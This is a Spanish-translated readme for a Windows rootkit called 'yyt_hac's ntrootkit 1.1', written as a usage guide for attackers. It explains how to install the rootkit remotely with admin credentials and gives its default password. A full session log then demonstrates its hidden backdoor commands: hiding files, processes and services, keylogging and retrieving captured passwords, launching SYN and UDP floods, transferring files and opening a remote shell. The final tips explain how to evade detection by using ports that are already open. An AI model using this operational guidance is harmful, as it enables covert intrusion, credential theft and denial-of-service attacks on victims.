yyt_hac's ntrootkit 1.1 Leéme Lo primero que debes saber es que este rookkit es tan potente que puede comunicar con el cliente de 4 formas diferentes (0:por defecto,1:Icmp,2:Udp,3:Tcp). Incluso bajo una utilidad como fport.exe no se mostrarán las conexiones que pueda haber. TCP y UDP son los protocolos más fiables para esto. Es importante que conozcas que la contraseña por defecto es "yyt_hac" . Esta contraseña debería cambiarse la primera vez que el backdoor es usado. -Instalación local y opciones para la línea de comandos C:\WINNT\system32>ntrootkit -h This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Uso: ntrootkit \\ip -u username -p password ip El ordenador en el que quieres instalar el rootkit -u [username] Cuenta de administrador en el ordenador remoto -p [password] Contraseña de administrador en el ordenador remoto Uso: ntrootkit [-v/-m/-u [password]/-i [password]] -v Muestra la versión de ntrootkit que está instalada -u [password] Desinstalar ntrootkit -i [password] Actualiza ntrootkit; la nueva versión funcionará después de que se reinicie -m Muestra el modo de trabajo de ntrootkit -m [workmode] Configura un modo de trabajo de rootkit (0=sniffer, 1=driver) C:\WINNT>ntrootkit //Instalación local, se ejecuta sin opciones This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Exacting files.....ok Installing service..ok Starting up The Ntrootkit..ok The Ntrootkit is installed and started successfully! C:\WINNT>ntrootkit -m This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com The ntrootkit is using windows 2000 sniffer mode to recv packet //Este modo no es estable, driver es altamente recomendado C:\WINNT\>ntrootkit -v ntrootkit -v This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com The Version of Ntrootkit that is installed is 1.1 C:\WINNT\system32>ntrootkit -i [password] //Actualizar rootkit ntrootkit -i yyt_hac This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Please enter you password: Please wait a minute..... Update successfully,the new version very runs after system reboots! -Instalación remota F:\letmein>ntrootkit \\202.38.*.* -u administrator -p 123456 This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Connecting to remote computer...ok Exacting files.....ok Installing service..ok Starting up The Ntrootkit..ok Disconnecting...ok The Ntrootkit is installed and started successfully! -Backdoor L:\c\rootkit\44\RTCLIENT\Release>rtclient It is yyt_hac's ntrootkit client 1.1 Welcome to http://www.yythac.com Uso :rtclient destip [-p password] [-t proto] [-o port] [-y icmp_type] [-d icmp_code] [-m MTU] [-c Command] destip-------------El ordenador al que te quieres conectar password-----------La contraseña de ntrootkit proto--------------El protocolo que ntrootkit usará (0:por defecto,1:icmp,2:udp,3:tcp) port---------------El puerto udp o tcp por donde se enviarán los paquetes (por defecto es 445) MTU----------------El tamaño máximo para cada paquete que ntrootkit usará (si no se proveé, el programa lo generará automáticamente) icmp_type----------El tipo de paquete icmp que será enviado al servidor; por defecto es ICMP_ECHO REPLY icmp_code----------El código de paquete icmp que se envía al servidor; por defecto es 0 Command------------El comando que quieres enviar al servidor para realizar un DDoS. Uso del comando:DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount] DDos_Destip--------El ordenador al que quieres hacer un DDoS DDos_Destport------El puerto destino al que quieres hacer un DDoS (que por defecto es 445) DDos_type----------El tipo de DDoS que quieres utilizar (0:ping flood,1:udp flood,2:synflood,3:mstream flood,default is 0) DDos_seconds-------Los segundos que quieres para el DDoS hacia el destino (que por defecto son 150 segundos) DDos_ProcCount-----El conteo de procesos usados por el servidor para hacer un DDoS (que por defecto es 10) //Sólo se requiere destip y password en la línea de comandos, los demás parámetros no son requeridos, ya que si no se indica lo contrario se toman los valores por defecto L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 It is yyt_hac's ntrootkit client 1.0 Welcome to http://www.yythac.com Getting ip address of the computer... 1. 1.1.1.89 2. 1.1.1.200 Please Select the number of the ip address you want to use to send and recv packet:1 Time out,Please make sure the target is up and try again //Si el puerto por defecto, que es el 445, no funciona, intenta otro con la opción -o L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 -o 139 It is yyt_hac's ntrootkit client 1.1 Welcome to http://www.yythac.com Getting ip address of the computer... 1. 1.1.1.89 2. 1.1.1.200 Please Select the number of the ip address you want to use to send and recv packet:1 Welcome to yyt_hac's ntrootkit Server 1.0,use '?' command to get command list CMD>? ********Lista de comandos ntrootkit para cuando estás en el servidor******** ?-------------------------------Muestra la ayuda HideFileDir [FileName or DIR]---Oculta el fichero o directorio HideProcId [pid]----------------Oculta el proceso con el id HideProcName [procname]---------Oculta el proceso con el nombre de proceso HideKey [KeyName]---------------Oculta una llave del Registro HideValue [ValueName]-----------Oculta un valor del Registro HideUser [UserName]-------------Oculta un usuario HideServ [ServiceName]----------Oculta un servicio ShowFileDir FileName or DIR-----Muestra el fichero o directorio que había sido ocultado antes ShowProcId pid------------------Muestra el proceso que había sido ocultado antes con el id ShowProcName procname-----------Muestra el proceso que había sido ocultado antes con el nombre de proceso ShowKey KeyName-----------------Muestra la clave del Registro ShowValue ValueName-------------Muestra el valor del Registro ShowUser UserName---------------Muestra el usuario que había sido ocultado antes ShowServ ServiceName------------Muestra el servicio que había sido ocultado antes Get RemoteFilePath [LocalFilePath]----Descarga un fichero remoto a tu ordenador Put LocalFilePath [RemoteFilePath]----Sube un fichero al ordenador remoto KeyLogOn------------------------------Arranca capturador de teclas KeyLogOff-----------------------------Detiene capturador de teclas DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]---DDoS a la IP de destino SDDOS---------------------------------Detener un DDoS GetPwd [LocalFilePath]----------------Descarga el fichero de contraseñas capturado por keylog a tu ordenador DelPwd--------------------------------Borra el fichero de contraseñas capturado por keylog Ps------------------------------------Muestra todos los procesos en una máquina remota Kill pid------------------------------Finaliza el proceso con el id o nombre RTVer---------------------------------Muestra la versión servidor de Ntrootkit y información del autor SetPass [NewPassword]-----------------Cambiar o mostrar la contraseña de conexión Reboot--------------------------------Reinicializar el ordenador remoto OpenShell-----------------------------Abrir una shell de comandos Exit----------------------------------Salir de la shell o rootkit //Notas HideKey,HideServ,etc Llamar a un comando Hide* sin parámetros, permite ver una lista de los elementos ocultos actuales HideUser [UserName]-------------------No implementado HideServ [ServiceName]----------------Ocultar un servicio por nombre de servicio, sin mostrar el nombre CMD>ps //Lista de procesos, incluyendo los ocultos ProcessID ProcessName 0 [System Process] 8 System 176 smss.exe 200 csrss.exe 224 WINLOGON.EXE 252 services.exe 264 LSASS.EXE 452 svchost.exe 508 spoolsv.exe 536 NETDDE.EXE 1364 ntfrs.exe 1392 NTservice.exe 1404 NTweb.exe 1412 CCP.exe 1900 termsrv.exe 1952 winmgmt.exe 1968 winvnc.exe 1992 dns.exe 2032 inetinfo.exe 2076 ismserv.exe 2512 explorer.exe 2720 internat.exe 2728 sqlmangr.exe 2652 plog.exe 2624 SysArchive.exe 2752 svchost.exe 3160 DWRCS.EXE 11544 SpntSvc.exe 23028 CCProxy.exe 27096 mshta.exe 27980 PSEXESVC.EXE 28008 cmd.exe 27872 rtkit.exe CMD>kill 27096 process is been killed ! CMD>rtver The ntrootkit version is 1.1, welcome to http://www.yythac.com CMD>hideprocid //Listar procesos ocultos The Hide ProcId: CMD>keylogon //Ejecutar capturador de teclado Key log Start successfully CMD>ddos 202.202.23.3.14 139 2 30 //DDoS a 202.23.3.14 con un syn flood en el puerto 139 durante 30 segundos DDos dip:202.23.3.14,DDos dport:139,DDos type:2,DDos seconds:30,DDos process count:10, DDos started successfully! CMD>ddos 202.23.3.14 139 2 30 //Sólo un DoS puede realizarse a la vez DDos already started CMD>sddos //Detener la ejecución de un ataque DoS Stop DDos sucessfully! CMD>openshell //Shell de comandos de Windows Microsoft Windows 2000 [ª©¥» 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>hideprocid //1500 es el procid de la línea de comandos. The Hide ProcId: 1500 C:\WINNT\system32>cd \ cd \ C:\>dir/w // Nota del traductor: la salida de la shell Windows se muestra en chino, por eso se visualizan los caracteres extraños de estos ejemplos dir/w ºÏºÐ°Ï C ¤¤ªººÏºÐ¨S¦³¼ÐÅÒ¡C ºÏºÐ°Ï§Ç¸¹: B472-5102 ¥Ø¿ý: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] ·s«Ø ¤å¥»¤å?.txt 19 ­ÓÀÉ®× 3,586,720 ¦ì¤¸²Õ 10 ­Ó¥Ø¿ý 1,213,169,664 ¦ì¤¸²Õ¥i¥Î C:\>hidefiledir *logfile.txt //Oculta el fichero llamado logfile.txt o cuyo nombre termina así, condicionado por el comodín * HideFileDir:successfully C:\>dir/w dir/w ºÏºÐ°Ï C ¤¤ªººÏºÐ¨S¦³¼ÐÅÒ¡C ºÏºÐ°Ï§Ç¸¹: B472-5102 ¥Ø¿ý: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] ·s«Ø ¤å¥»¤å?.txt 18 ­ÓÀÉ®× 3,586,582 ¦ì¤¸²Õ 10 ­Ó¥Ø¿ý 1,213,169,664 ¦ì¤¸²Õ¥i¥Î C:\>hidefiledir //Fichero ocultado con éxito The Hide File or Dir: *LOGFILE.TXT C:\>showfiledir *logfile.txt //Mostrar *logfile.txt ShowFileDir:successfully C:\>showfiledir *logfile.txt ShowFileDir:already hidden or not found C:\>dir/w //Repetimos dir/w ºÏºÐ°Ï C ¤¤ªººÏºÐ¨S¦³¼ÐÅÒ¡C ºÏºÐ°Ï§Ç¸¹: B472-5102 ¥Ø¿ý: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] ·s«Ø ¤å¥»¤å?.txt 19 ­ÓÀÉ®× 3,586,720 ¦ì¤¸²Õ 10 ­Ó¥Ø¿ý 1,213,169,664 ¦ì¤¸²Õ¥i¥Î C:\>get tsc.zip //El fichero existe, está ahí Can't open file C:\>get c:\tsc.zip d:\zips\tsc.zip //Descargar c:\tsc.zip a d:\zips\tsc.zip ................................................................................ ................................................................................ ..................Get file sucssesfully! C:\>put c:\logfile.txt c:\f.txt //Subir c:\logfile.txt a c:\f.txt .....Put file successfully! C:\>dir/w dir/w ºÏºÐ°Ï C ¤¤ªººÏºÐ¨S¦³¼ÐÅÒ¡C ºÏºÐ°Ï§Ç¸¹: B472-5102 ¥Ø¿ý: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] f.txt [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] ·s«Ø ¤å¥»¤å?.txt 20 ­ÓÀÉ®× 3,593,221 ¦ì¤¸²Õ 10 ­Ó¥Ø¿ý 1,213,161,472 ¦ì¤¸²Õ¥i¥Î C:\>del f.txt del f.txt C:\>exit //Salir del shell, regresando al menú principal del backdoor CMD>exit //Salir del backdoor exit successfully bye bye F:\letmein> 1. Si tú y la máquina objetivo no tenéis una dirección externa, entonces sólo puedes usar el protocolo tcp/udp para el backdoor, aunque todavía puedes especificar un puerto diferente. 2. Es recomendable colocar el backdoor en un puerto existente y abierto, como alguno de estos: UDP - 445,137,138,500,4000,53,etc TCP - 445,139,80,21,23,135,53,etc 3. El cliente del backdoor y el rootkit no pueden comunicarse en el mismo ordenador. Si intentas conectar a localhost usando el cliente no trabajará. 4. Las máquinas con direcciones IP externas pueden usar TCP/UDP/ICMP. TCP/UDP son recomendados, a menos que la máquina se bloquee. Los pings ICMP son la mejor opción. 5. Si no sales del backdoor adecuadamente, con el comando exit, espera unos pocos minutos antes de reconectar. 6. Si usas el modo de trabajo "sniffer", el backdoor puede colapsar todo ante un volumen de tráfico elevado. Usalo adecuadamente. 7. No olvides cambiar la contraseña del rootkit con el comando SetPass; por defecto es "yyt_hac". 8. Usa versiones rootkit y clientes que sean las correctas. Versiones desfasadas o antiguas no se garantiza que sean compatibles. -Gracias a la AIH (http://www.infohacker.org) por la versión en español Web:http://www.yythac.com Email:webmaster@yythac.com QQ:47090005 icq:272288117